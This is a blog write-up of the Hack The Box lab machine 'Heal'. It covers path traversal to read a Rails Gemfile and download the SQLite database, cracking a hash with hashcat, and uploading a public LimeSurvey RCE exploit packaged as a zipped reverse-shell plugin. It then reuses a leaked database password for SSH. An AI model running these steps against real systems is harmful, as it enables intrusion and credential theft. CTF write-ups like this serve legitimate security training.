"Heal" by Hack The Box - A "Medium" Linux Box Writeup
·1047 words·5 mins
Author
Lacroix Raphaël (Chepycou)
I’m Raphaël LACROIX, a French computer scientist developping various applications in my free time ranging from definitely useless to somewhat usefull. I also do quite a lot of Capture the flag and cybersecurity challenges.
Table of Contents
Table of Contents
Hack The Box Medium Boxes - This article is part of a series.
Let’s try creating an account :
pentester:bd1724b2f8cb07ada1f6e094d9a1b33878171f490090ae0d8826ee3c1a940309
We see that the site is trying to contact api.heal.htb so let’s add that also to our hosts file and we get this page.
This looks interesting we have access to a “profile” page which shows that we are not admin (which hints that we may become) :
We also have a survey button that leads us to another vhost : take-survey.heal.htb which seems to be hosting an instance of limesurvey.
So we have two potential attacks :
There is a form on http://heal.htb/resume that enables us to create a PDF : potential template injection or SSRF
The survey may be read by an admin and be vulnerable to XSS
Great, let’s now try to get the backend tech stack (so we know what to look for) let’s try using wappalyzer on http://api.heal.htb/ :
Well, no need we now know whe’re having a ruby on rails server. Since I never used ruby on rails I searched for the general file layout and found that there is a gemfile somewhere at the root. This would enable us to locate where we are in the directory :
We can get the Gemfile by accessing ../../Gemfile so we are probably in something that looks like myapp/uploads/
# SQLite. Versions 3.8.0 and up are supported.# gem install sqlite3## Ensure the SQLite 3 gem is defined in your Gemfile# gem "sqlite3"#default:&defaultadapter:sqlite3pool:<%=ENV.fetch("RAILS_MAX_THREADS"){5}%>timeout:5000development:<<:*defaultdatabase:storage/development.sqlite3# Warning: The database defined as "test" will be erased and# re-generated from your development database when you run "rake".# Do not set this db to the same as development or production.test:<<:*defaultdatabase:storage/test.sqlite3production:<<:*defaultdatabase:storage/development.sqlite3
Knowing this let’s try to dump the sqlite db with ../../storage/development.sqlite3 :
We can then explore this db using DB browser for SQLite :
Let us then write this hash to a file and run hashcat on it :
This password sadly is not reused for SSH (would have been fun eh) so let’s login as Ralph and see what the administrator has access to. We log in and surprise : nothing new. I tried to fuzz a bit with the new credentials (which are being passed on to the API as JWT) and nothing comes again. So let’s see if the form can be of any use now that we have access to an admin account.
git clone https://github.com/N4s1rl1/Limesurvey-6.6.4-RCE.git
cd Limesurvey-6.6.4-RCE
vim revshell.php # Put the right IP + Portzip -r N4s1rl1.zip config.xml revshell.php # In a real world scenario we would of course rename this to somehting less fishy# Create a venv for this tooluv venv --python 3.13
source .venv/bin/activate
uv pip install -r requirements.txt
Let’s search for interesting stuff. We can find that the postgressql port is open as well and that limesurvey uses postgressql with the following password :
# Content of /var/www/limesurvey/application/config/config.php'db'=>array('connectionString'=>'pgsql:host=localhost;port=5432;user=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey;','emulatePrepare'=>true,'username'=>'db_user','password'=>'AdmiDi0_pA$$w0rd','charset'=>'utf8','tablePrefix'=>'lime_',),
I then tried to login to the postgress instance but did not manage to do it, so I thought maybe this password could be reused somewhere else :
Looking at the passwd file we can see that ralph and ron are both loggable users so let’s try them :
We can now connect via SSH which means we’ll have a better access using SSH + the ability to forward some of the ports to access them from our attack machine :
